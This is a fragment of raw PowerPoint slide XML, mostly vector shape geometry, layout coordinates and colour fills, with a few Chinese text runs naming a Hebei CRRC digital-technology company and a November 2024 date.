                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 12 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 29"/>
                <a:gd name="T8" fmla="*/ 12 w 30"/>
                <a:gd name="T9" fmla="*/ 5 h 29"/>
                <a:gd name="T10" fmla="*/ 0 w 30"/>
                <a:gd name="T11" fmla="*/ 5 h 29"/>
                <a:gd name="T12" fmla="*/ 0 w 30"/>
                <a:gd name="T13" fmla="*/ 22 h 29"/>
                <a:gd name="T14" fmla="*/ 12 w 30"/>
                <a:gd name="T15" fmla="*/ 22 h 29"/>
                <a:gd name="T16" fmla="*/ 12 w 30"/>
                <a:gd name="T17" fmla="*/ 29 h 29"/>
                <a:gd name="T18" fmla="*/ 17 w 30"/>
                <a:gd name="T19" fmla="*/ 29 h 29"/>
                <a:gd name="T20" fmla="*/ 17 w 30"/>
                <a:gd name="T21" fmla="*/ 22 h 29"/>
                <a:gd name="T22" fmla="*/ 30 w 30"/>
                <a:gd name="T23" fmla="*/ 22 h 29"/>
                <a:gd name="T24" fmla="*/ 30 w 30"/>
                <a:gd name="T25" fmla="*/ 9 h 29"/>
                <a:gd name="T26" fmla="*/ 26 w 30"/>
                <a:gd name="T27" fmla="*/ 5 h 29"/>
                <a:gd name="T28" fmla="*/ 12 w 30"/>
                <a:gd name="T29" fmla="*/ 18 h 29"/>
                <a:gd name="T30" fmla="*/ 5 w 30"/>
                <a:gd name="T31" fmla="*/ 18 h 29"/>
                <a:gd name="T32" fmla="*/ 5 w 30"/>
                <a:gd name="T33" fmla="*/ 8 h 29"/>
                <a:gd name="T34" fmla="*/ 12 w 30"/>
                <a:gd name="T35" fmla="*/ 8 h 29"/>
                <a:gd name="T36" fmla="*/ 12 w 30"/>
                <a:gd name="T37" fmla="*/ 18 h 29"/>
                <a:gd name="T38" fmla="*/ 24 w 30"/>
                <a:gd name="T39" fmla="*/ 18 h 29"/>
                <a:gd name="T40" fmla="*/ 17 w 30"/>
                <a:gd name="T41" fmla="*/ 18 h 29"/>
                <a:gd name="T42" fmla="*/ 17 w 30"/>
                <a:gd name="T43" fmla="*/ 8 h 29"/>
                <a:gd name="T44" fmla="*/ 23 w 30"/>
                <a:gd name="T45" fmla="*/ 8 h 29"/>
                <a:gd name="T46" fmla="*/ 24 w 30"/>
                <a:gd name="T47" fmla="*/ 10 h 29"/>
                <a:gd name="T48" fmla="*/ 24 w 30"/>
                <a:gd name="T49" fmla="*/ 1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" h="29">
                  <a:moveTo>
                    <a:pt x="26" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="5"/>
                    <a:pt x="17" y="5"/>
                    <a:pt x="17" y="5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0" y="22"/>
                    <a:pt x="30" y="13"/>
                    <a:pt x="30" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="6"/>
                    <a:pt x="28" y="5"/>
                    <a:pt x="26" y="5"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="18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12" y="8"/>
                    <a:pt x="12" y="8"/>
                    <a:pt x="12" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="18"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="1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21" y="8"/>
                    <a:pt x="23" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="8"/>
                    <a:pt x="24" y="9"/>
                    <a:pt x="24" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="12"/>
                    <a:pt x="24" y="18"/>
                    <a:pt x="24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6"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1528" y="261"/>
              <a:ext cx="148" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 29"/>
                <a:gd name="T1" fmla="*/ 5 h 29"/>
                <a:gd name="T2" fmla="*/ 17 w 29"/>
                <a:gd name="T3" fmla="*/ 5 h 29"/>
                <a:gd name="T4" fmla="*/ 17 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 12 w 29"/>
                <a:gd name="T7" fmla="*/ 0 h 29"/>
                <a:gd name="T8" fmla="*/ 12 w 29"/>
                <a:gd name="T9" fmla="*/ 5 h 29"/>
                <a:gd name="T10" fmla="*/ 0 w 29"/>
                <a:gd name="T11" fmla="*/ 5 h 29"/>
                <a:gd name="T12" fmla="*/ 0 w 29"/>
                <a:gd name="T13" fmla="*/ 22 h 29"/>
                <a:gd name="T14" fmla="*/ 12 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 29"/>
                <a:gd name="T16" fmla="*/ 12 w 29"/>
                <a:gd name="T17" fmla="*/ 29 h 29"/>
                <a:gd name="T18" fmla="*/ 17 w 29"/>
                <a:gd name="T19" fmla="*/ 29 h 29"/>
                <a:gd name="T20" fmla="*/ 17 w 29"/>
                <a:gd name="T21" fmla="*/ 22 h 29"/>
                <a:gd name="T22" fmla="*/ 29 w 29"/>
                <a:gd name="T23" fmla="*/ 22 h 29"/>
                <a:gd name="T24" fmla="*/ 29 w 29"/>
                <a:gd name="T25" fmla="*/ 9 h 29"/>
                <a:gd name="T26" fmla="*/ 25 w 29"/>
                <a:gd name="T27" fmla="*/ 5 h 29"/>
                <a:gd name="T28" fmla="*/ 12 w 29"/>
                <a:gd name="T29" fmla="*/ 18 h 29"/>
                <a:gd name="T30" fmla="*/ 5 w 29"/>
                <a:gd name="T31" fmla="*/ 18 h 29"/>
                <a:gd name="T32" fmla="*/ 5 w 29"/>
                <a:gd name="T33" fmla="*/ 8 h 29"/>
                <a:gd name="T34" fmla="*/ 12 w 29"/>
                <a:gd name="T35" fmla="*/ 8 h 29"/>
                <a:gd name="T36" fmla="*/ 12 w 29"/>
                <a:gd name="T37" fmla="*/ 18 h 29"/>
                <a:gd name="T38" fmla="*/ 24 w 29"/>
                <a:gd name="T39" fmla="*/ 18 h 29"/>
                <a:gd name="T40" fmla="*/ 17 w 29"/>
                <a:gd name="T41" fmla="*/ 18 h 29"/>
                <a:gd name="T42" fmla="*/ 17 w 29"/>
                <a:gd name="T43" fmla="*/ 8 h 29"/>
                <a:gd name="T44" fmla="*/ 22 w 29"/>
                <a:gd name="T45" fmla="*/ 8 h 29"/>
                <a:gd name="T46" fmla="*/ 24 w 29"/>
                <a:gd name="T47" fmla="*/ 10 h 29"/>
                <a:gd name="T48" fmla="*/ 24 w 29"/>
                <a:gd name="T49" fmla="*/ 1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9" h="29">
                  <a:moveTo>
                    <a:pt x="25" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="5"/>
                    <a:pt x="17" y="5"/>
                    <a:pt x="17" y="5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13"/>
                    <a:pt x="29" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="6"/>
                    <a:pt x="27" y="5"/>
                    <a:pt x="25" y="5"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="18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12" y="8"/>
                    <a:pt x="12" y="8"/>
                    <a:pt x="12" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="18"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="1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21" y="8"/>
                    <a:pt x="22" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="8"/>
                    <a:pt x="24" y="9"/>
                    <a:pt x="24" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="12"/>
                    <a:pt x="24" y="18"/>
                    <a:pt x="24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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1370" y="292"/>
              <a:ext cx="92" cy="89"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 92"/>
                <a:gd name="T1" fmla="*/ 89 h 89"/>
                <a:gd name="T2" fmla="*/ 0 w 92"/>
                <a:gd name="T3" fmla="*/ 73 h 89"/>
                <a:gd name="T4" fmla="*/ 36 w 92"/>
                <a:gd name="T5" fmla="*/ 73 h 89"/>
                <a:gd name="T6" fmla="*/ 36 w 92"/>
                <a:gd name="T7" fmla="*/ 52 h 89"/>
                <a:gd name="T8" fmla="*/ 6 w 92"/>
                <a:gd name="T9" fmla="*/ 52 h 89"/>
                <a:gd name="T10" fmla="*/ 6 w 92"/>
                <a:gd name="T11" fmla="*/ 37 h 89"/>
                <a:gd name="T12" fmla="*/ 36 w 92"/>
                <a:gd name="T13" fmla="*/ 37 h 89"/>
                <a:gd name="T14" fmla="*/ 36 w 92"/>
                <a:gd name="T15" fmla="*/ 16 h 89"/>
                <a:gd name="T16" fmla="*/ 0 w 92"/>
                <a:gd name="T17" fmla="*/ 16 h 89"/>
                <a:gd name="T18" fmla="*/ 0 w 92"/>
                <a:gd name="T19" fmla="*/ 0 h 89"/>
                <a:gd name="T20" fmla="*/ 92 w 92"/>
                <a:gd name="T21" fmla="*/ 0 h 89"/>
                <a:gd name="T22" fmla="*/ 92 w 92"/>
                <a:gd name="T23" fmla="*/ 16 h 89"/>
                <a:gd name="T24" fmla="*/ 56 w 92"/>
                <a:gd name="T25" fmla="*/ 16 h 89"/>
                <a:gd name="T26" fmla="*/ 56 w 92"/>
                <a:gd name="T27" fmla="*/ 37 h 89"/>
                <a:gd name="T28" fmla="*/ 87 w 92"/>
                <a:gd name="T29" fmla="*/ 37 h 89"/>
                <a:gd name="T30" fmla="*/ 87 w 92"/>
                <a:gd name="T31" fmla="*/ 52 h 89"/>
                <a:gd name="T32" fmla="*/ 56 w 92"/>
                <a:gd name="T33" fmla="*/ 52 h 89"/>
                <a:gd name="T34" fmla="*/ 56 w 92"/>
                <a:gd name="T35" fmla="*/ 73 h 89"/>
                <a:gd name="T36" fmla="*/ 72 w 92"/>
                <a:gd name="T37" fmla="*/ 73 h 89"/>
                <a:gd name="T38" fmla="*/ 72 w 92"/>
                <a:gd name="T39" fmla="*/ 63 h 89"/>
                <a:gd name="T40" fmla="*/ 92 w 92"/>
                <a:gd name="T41" fmla="*/ 63 h 89"/>
                <a:gd name="T42" fmla="*/ 92 w 92"/>
                <a:gd name="T43" fmla="*/ 89 h 89"/>
                <a:gd name="T44" fmla="*/ 0 w 92"/>
                <a:gd name="T4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2" h="89">
                  <a:moveTo>
                    <a:pt x="0" y="89"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3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92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0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18"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1340" y="261"/>
              <a:ext cx="153" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 30"/>
                <a:gd name="T1" fmla="*/ 0 h 29"/>
                <a:gd name="T2" fmla="*/ 0 w 30"/>
                <a:gd name="T3" fmla="*/ 0 h 29"/>
                <a:gd name="T4" fmla="*/ 0 w 30"/>
                <a:gd name="T5" fmla="*/ 29 h 29"/>
                <a:gd name="T6" fmla="*/ 30 w 30"/>
                <a:gd name="T7" fmla="*/ 29 h 29"/>
                <a:gd name="T8" fmla="*/ 30 w 30"/>
                <a:gd name="T9" fmla="*/ 4 h 29"/>
                <a:gd name="T10" fmla="*/ 26 w 30"/>
                <a:gd name="T11" fmla="*/ 0 h 29"/>
                <a:gd name="T12" fmla="*/ 25 w 30"/>
                <a:gd name="T13" fmla="*/ 26 h 29"/>
                <a:gd name="T14" fmla="*/ 5 w 30"/>
                <a:gd name="T15" fmla="*/ 26 h 29"/>
                <a:gd name="T16" fmla="*/ 5 w 30"/>
                <a:gd name="T17" fmla="*/ 4 h 29"/>
                <a:gd name="T18" fmla="*/ 24 w 30"/>
                <a:gd name="T19" fmla="*/ 4 h 29"/>
                <a:gd name="T20" fmla="*/ 25 w 30"/>
                <a:gd name="T21" fmla="*/ 5 h 29"/>
                <a:gd name="T22" fmla="*/ 25 w 30"/>
                <a:gd name="T23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29">
                  <a:moveTo>
                    <a:pt x="26" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0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29"/>
                    <a:pt x="30" y="5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lose/>
                  <a:moveTo>
                    <a:pt x="25" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="26"/>
                    <a:pt x="5" y="26"/>
                    <a:pt x="5" y="26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5" y="4"/>
                    <a:pt x="25" y="4"/>
                    <a:pt x="25" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1711" y="261"/>
              <a:ext cx="148" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 18 w 29"/>
                <a:gd name="T1" fmla="*/ 21 h 29"/>
                <a:gd name="T2" fmla="*/ 18 w 29"/>
                <a:gd name="T3" fmla="*/ 17 h 29"/>
                <a:gd name="T4" fmla="*/ 28 w 29"/>
                <a:gd name="T5" fmla="*/ 17 h 29"/>
                <a:gd name="T6" fmla="*/ 28 w 29"/>
                <a:gd name="T7" fmla="*/ 13 h 29"/>
                <a:gd name="T8" fmla="*/ 18 w 29"/>
                <a:gd name="T9" fmla="*/ 13 h 29"/>
                <a:gd name="T10" fmla="*/ 18 w 29"/>
                <a:gd name="T11" fmla="*/ 9 h 29"/>
                <a:gd name="T12" fmla="*/ 13 w 29"/>
                <a:gd name="T13" fmla="*/ 9 h 29"/>
                <a:gd name="T14" fmla="*/ 13 w 29"/>
                <a:gd name="T15" fmla="*/ 13 h 29"/>
                <a:gd name="T16" fmla="*/ 6 w 29"/>
                <a:gd name="T17" fmla="*/ 13 h 29"/>
                <a:gd name="T18" fmla="*/ 10 w 29"/>
                <a:gd name="T19" fmla="*/ 6 h 29"/>
                <a:gd name="T20" fmla="*/ 29 w 29"/>
                <a:gd name="T21" fmla="*/ 6 h 29"/>
                <a:gd name="T22" fmla="*/ 29 w 29"/>
                <a:gd name="T23" fmla="*/ 3 h 29"/>
                <a:gd name="T24" fmla="*/ 12 w 29"/>
                <a:gd name="T25" fmla="*/ 3 h 29"/>
                <a:gd name="T26" fmla="*/ 14 w 29"/>
                <a:gd name="T27" fmla="*/ 0 h 29"/>
                <a:gd name="T28" fmla="*/ 8 w 29"/>
                <a:gd name="T29" fmla="*/ 0 h 29"/>
                <a:gd name="T30" fmla="*/ 7 w 29"/>
                <a:gd name="T31" fmla="*/ 3 h 29"/>
                <a:gd name="T32" fmla="*/ 0 w 29"/>
                <a:gd name="T33" fmla="*/ 3 h 29"/>
                <a:gd name="T34" fmla="*/ 0 w 29"/>
                <a:gd name="T35" fmla="*/ 6 h 29"/>
                <a:gd name="T36" fmla="*/ 5 w 29"/>
                <a:gd name="T37" fmla="*/ 6 h 29"/>
                <a:gd name="T38" fmla="*/ 1 w 29"/>
                <a:gd name="T39" fmla="*/ 12 h 29"/>
                <a:gd name="T40" fmla="*/ 1 w 29"/>
                <a:gd name="T41" fmla="*/ 14 h 29"/>
                <a:gd name="T42" fmla="*/ 1 w 29"/>
                <a:gd name="T43" fmla="*/ 17 h 29"/>
                <a:gd name="T44" fmla="*/ 13 w 29"/>
                <a:gd name="T45" fmla="*/ 17 h 29"/>
                <a:gd name="T46" fmla="*/ 13 w 29"/>
                <a:gd name="T47" fmla="*/ 21 h 29"/>
                <a:gd name="T48" fmla="*/ 0 w 29"/>
                <a:gd name="T49" fmla="*/ 21 h 29"/>
                <a:gd name="T50" fmla="*/ 0 w 29"/>
                <a:gd name="T51" fmla="*/ 24 h 29"/>
                <a:gd name="T52" fmla="*/ 13 w 29"/>
                <a:gd name="T53" fmla="*/ 24 h 29"/>
                <a:gd name="T54" fmla="*/ 13 w 29"/>
                <a:gd name="T55" fmla="*/ 29 h 29"/>
                <a:gd name="T56" fmla="*/ 18 w 29"/>
                <a:gd name="T57" fmla="*/ 29 h 29"/>
                <a:gd name="T58" fmla="*/ 18 w 29"/>
                <a:gd name="T59" fmla="*/ 24 h 29"/>
                <a:gd name="T60" fmla="*/ 29 w 29"/>
                <a:gd name="T61" fmla="*/ 24 h 29"/>
                <a:gd name="T62" fmla="*/ 29 w 29"/>
                <a:gd name="T63" fmla="*/ 21 h 29"/>
                <a:gd name="T64" fmla="*/ 18 w 29"/>
                <a:gd name="T65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" h="29">
                  <a:moveTo>
                    <a:pt x="18" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="17"/>
                    <a:pt x="18" y="17"/>
                    <a:pt x="1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4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1"/>
                    <a:pt x="29" y="21"/>
                    <a:pt x="29" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18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animBg="1"/>
    </p:bld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random/>
  </p:transition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>
    <p:random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jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1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9.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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_任意多边形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1381374"/>
            <a:ext cx="8105565" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1346 w 2540"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 2540"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 0 w 2540"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 2540 w 2540"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 1346 w 2540"/>
              <a:gd name="T9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0" h="1282">
                <a:moveTo>
                  <a:pt x="1346" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="1282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t="-25000" b="-10000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PA_任意多边形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3740048" y="1381374"/>
            <a:ext cx="4365517" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 171 w 1368"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 1368"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 1225 w 1368"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 1368 w 1368"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 171 w 1368"/>
              <a:gd name="T9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68" h="1282">
                <a:moveTo>
                  <a:pt x="171" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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" name="PA_任意多边形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1373119"/>
            <a:ext cx="7352450" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2304 w 2304"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 2304"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 1213 w 2304"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 2304 w 2304"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 2304 w 2304"/>
              <a:gd name="T9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04" h="1282">
                <a:moveTo>
                  <a:pt x="2304" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7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9" name="PA_任意多边形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8959346" y="392112"/>
            <a:ext cx="3232654" cy="727586"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1013 w 1013"/>
              <a:gd name="T1" fmla="*/ 228 h 228"/>
              <a:gd name="T2" fmla="*/ 0 w 1013"/>
              <a:gd name="T3" fmla="*/ 228 h 228"/>
              <a:gd name="T4" fmla="*/ 208 w 1013"/>
              <a:gd name="T5" fmla="*/ 0 h 228"/>
              <a:gd name="T6" fmla="*/ 1013 w 1013"/>
              <a:gd name="T7" fmla="*/ 0 h 228"/>
              <a:gd name="T8" fmla="*/ 1013 w 1013"/>
              <a:gd name="T9" fmla="*/ 228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3" h="228">
                <a:moveTo>
                  <a:pt x="1013" y="228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013" y="228"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BC282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1" name="PA_矩形 19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 flipH="1">
            <a:off x="9080611" y="6142596"/>
            <a:ext cx="3111389" cy="181898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PA_矩形 20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0" y="816538"/>
            <a:ext cx="4531458" cy="181898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PA_矩形 2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 flipH="1">
            <a:off x="7660542" y="5718171"/>
            <a:ext cx="4531458" cy="181898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PA_任意多边形 22"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5718171"/>
            <a:ext cx="4110224" cy="756308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1060 w 1288"/>
              <a:gd name="T1" fmla="*/ 237 h 237"/>
              <a:gd name="T2" fmla="*/ 0 w 1288"/>
              <a:gd name="T3" fmla="*/ 237 h 237"/>
              <a:gd name="T4" fmla="*/ 0 w 1288"/>
              <a:gd name="T5" fmla="*/ 0 h 237"/>
              <a:gd name="T6" fmla="*/ 1288 w 1288"/>
              <a:gd name="T7" fmla="*/ 0 h 237"/>
              <a:gd name="T8" fmla="*/ 1060 w 1288"/>
              <a:gd name="T9" fmla="*/ 237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8" h="237">
                <a:moveTo>
                  <a:pt x="1060" y="237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="237"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7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28" name="PA_直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6109853" y="4588045"/>
            <a:ext cx="57737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A_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9731742" y="469601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銮生舆宙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PA_文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8754072" y="4652044"/>
            <a:ext cx="323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河北中车数智科技有限公司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554720" y="5050790"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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202</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月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" name="PA_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697597" y="5804871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守护天机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PA_文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
